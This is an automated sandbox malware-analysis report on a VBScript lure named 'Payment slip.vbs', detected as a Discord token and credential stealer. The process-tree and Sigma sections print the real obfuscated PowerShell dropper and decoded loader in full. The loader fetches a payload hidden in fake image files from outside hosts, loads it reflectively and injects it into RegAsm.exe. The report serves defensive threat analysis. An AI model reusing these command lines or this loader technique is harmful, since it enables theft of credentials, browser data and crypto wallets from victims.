Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Payment slip.vbs

Overview

General Information

Sample name:Payment slip.vbs
Analysis ID:1608231
MD5:7719d2cd7c8954f023992f237810dae5
SHA1:3706b8094f2bdcfc9947403f4a319d2f31a0faa9
SHA256:4165e5581b60355e14add9ee2ab2e1a47096dd6a6d4424494df27ec4c3ff5423
Tags:vbsuser-abuse_ch
Infos:

Detection

Discord Token Stealer
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Powershell download and load assembly
Sigma detected: Powershell download payload from hardcoded c2 list
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected AntiVM3
Yara detected Discord Token Stealer
Yara detected Powershell download and execute
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
Found many strings related to Crypto-Wallets (likely being stolen)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Sample has a suspicious name (potential lure to open the executable)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 6944 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Payment slip.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 976 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GM@YwBj@GM@YwBj@GM@YwBj@GM@YwBj@G4@bQBm@Gc@LwBn@HY@Z@Bm@Gg@Z@@v@GQ@bwB3@G4@b@Bv@GE@Z@Bz@C8@d@Bl@HM@d@@u@Go@c@Bn@D8@MQ@z@Dc@MQ@x@DM@Jw@s@C@@JwBo@HQ@d@Bw@HM@Og@v@C8@bwBm@Gk@YwBl@DM@Ng@1@C4@ZwBp@HQ@a@B1@GI@LgBp@G8@Lw@x@C8@d@Bl@HM@d@@u@Go@c@Bn@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@C@@PQ@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQ@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@YgBh@HM@ZQ@2@DQ@QwBv@G0@bQBh@G4@Z@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@UwB1@GI@cwB0@HI@aQBu@Gc@K@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@L@@g@CQ@YgBh@HM@ZQ@2@DQ@T@Bl@G4@ZwB0@Gg@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@EU@bgBj@G8@Z@Bl@GQ@V@Bl@Hg@d@@g@D0@WwBD@G8@bgB2@GU@cgB0@F0@Og@6@FQ@bwBC@GE@cwBl@DY@N@BT@HQ@cgBp@G4@Zw@o@CQ@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBD@G8@bgB2@GU@cgB0@F0@Og@6@EY@cgBv@G0@QgBh@HM@ZQ@2@DQ@UwB0@HI@aQBu@Gc@K@@k@GI@YQBz@GU@Ng@0@EM@bwBt@G0@YQBu@GQ@KQ@7@C@@I@@g@CQ@d@Bl@Hg@d@@g@D0@I@@k@EU@bgBj@G8@Z@Bl@GQ@V@Bl@Hg@d@@7@C@@J@Bs@G8@YQBk@GU@Z@BB@HM@cwBl@G0@YgBs@Hk@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FI@ZQBm@Gw@ZQBj@HQ@aQBv@G4@LgBB@HM@cwBl@G0@YgBs@Hk@XQ@6@Do@T@Bv@GE@Z@@o@CQ@YwBv@G0@bQBh@G4@Z@BC@Hk@d@Bl@HM@KQ@7@C@@I@@k@EU@bgBj@G8@Z@Bl@GQ@V@Bl@Hg@d@@g@D0@WwBD@G8@bgB2@GU@cgB0@F0@Og@6@FQ@bwBC@GE@cwBl@DY@N@BT@HQ@cgBp@G4@Zw@o@CQ@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bj@G8@bQBw@HI@ZQBz@HM@ZQBk@EI@eQB0@GU@QQBy@HI@YQB5@C@@PQ@g@Ec@ZQB0@C0@QwBv@G0@c@By@GU@cwBz@GU@Z@BC@Hk@d@Bl@EE@cgBy@GE@eQ@g@C0@YgB5@HQ@ZQBB@HI@cgBh@Hk@I@@k@GU@bgBj@FQ@ZQB4@HQ@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@d@B5@H@@ZQ@g@D0@I@@k@Gw@bwBh@GQ@ZQBk@EE@cwBz@GU@bQBi@Gw@eQ@u@Ec@ZQB0@FQ@eQBw@GU@K@@n@HQ@ZQBz@HQ@c@Bv@Hc@ZQBy@HM@a@Bl@Gw@b@@u@Eg@bwBh@GE@YQBh@GE@YQBz@GQ@bQBl@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@RQBu@GM@bwBk@GU@Z@BU@GU@e@B0@C@@PQBb@EM@bwBu@HY@ZQBy@HQ@XQ@6@Do@V@Bv@EI@YQBz@GU@Ng@0@FM@d@By@Gk@bgBn@Cg@J@BC@Hk@d@Bl@HM@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@bQBl@HQ@a@Bv@GQ@I@@9@C@@J@B0@Hk@c@Bl@C4@RwBl@HQ@TQBl@HQ@a@Bv@GQ@K@@n@Gw@ZgBz@Gc@ZQBk@GQ@Z@Bk@GQ@Z@Bk@GE@Jw@p@C4@SQBu@HY@bwBr@GU@K@@k@G4@dQBs@Gw@L@@g@Fs@bwBi@Go@ZQBj@HQ@WwBd@F0@I@@o@Cc@d@B4@HQ@LgBk@GY@ZwBk@G0@QQBJ@C8@bgBp@GE@bQ@v@HM@Z@Bh@GU@a@@v@HM@ZgBl@HI@LwBr@DY@Mw@v@DM@MQ@y@GU@aQBo@GM@aQBy@C8@bQBv@GM@LgB0@G4@ZQB0@G4@bwBj@HI@ZQBz@HU@YgB1@Gg@d@Bp@Gc@LgB3@GE@cg@v@C8@OgBz@Cc@L@@g@Cc@M@@n@Cw@I@@n@FM@d@Bh@HI@d@B1@H@@TgBh@G0@ZQ@n@Cw@I@@n@FI@ZQBn@EE@cwBt@Cc@L@@g@Cc@M@@n@Ck@KQB9@H0@';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $dosigo.replace('@','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 6164 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/ccccccccccccnmfg/gvdfhd/downloads/test.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] ('txt.dfgdmAI/niam/sdaeh/sfer/k63/312eihcir/moc.tnetnocresubuhtig.war//:s', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec MD5: 04029E121A0CFA5991749937DD22A1D9)
        • RegAsm.exe (PID: 3896 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.1642022551.00000000059F0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
    00000006.00000002.1619760521.00000000032A1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
      00000006.00000002.1619760521.0000000003518000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000006.00000002.1619760521.0000000003384000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: powershell.exe PID: 976JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Click to see the 7 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            6.2.RegAsm.exe.59f0000.3.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security

              Other

              SourceRuleDescriptionAuthorStrings
              amsi64_6164.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

                Sigma Signatures

                Spreading

                barindex
                Sigma detected: Powershell download payload from hardcoded c2 list
                Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/ccccccccccccnmfg/gvdfhd/downloads/test.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] ('txt.dfgdmAI/niam/sdaeh/sfer/k63/312eihcir/moc.tnetnocresubuhtig.war//:s', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/ccccccccccccnmfg/gvdfhd/downloads/test.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Le

                System Summary

                barindex
                Sigma detected: Base64 Encoded PowerShell Command Detected
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GM@YwBj@GM@YwBj@GM@YwBj@GM@YwBj@G4@bQBm@Gc@LwBn@HY@Z@Bm@Gg@Z@@v@GQ@bwB3@G4@b@Bv@GE@Z@Bz@C8@d@Bl@HM@d@@u@Go@c@Bn@D8@MQ@z@Dc@MQ@x@DM@Jw@s@C@@JwBo@HQ@d@Bw@HM@Og@v@C8@bwBm@Gk@YwBl@DM@Ng@1@C4@ZwBp@HQ@a@B1@GI@LgBp@G8@Lw@x@C8@d@Bl@HM@d@@u@Go@c@Bn@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@C@@PQ@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQ@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@7@@0@Cg@g@C@@I
                Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0